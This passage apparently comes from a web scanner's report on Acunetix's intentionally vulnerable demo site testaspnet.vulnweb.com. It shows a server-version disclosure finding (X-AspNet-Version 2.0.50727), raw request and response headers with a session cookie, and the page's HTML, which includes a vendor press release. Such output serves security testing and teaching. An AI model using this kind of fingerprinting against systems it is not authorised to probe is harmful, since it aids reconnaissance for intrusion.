hlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8+YwLqXVDFYA1YYr1Hu6oI9o" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Method	GET
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 30545
Response Body - size: 30,545 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY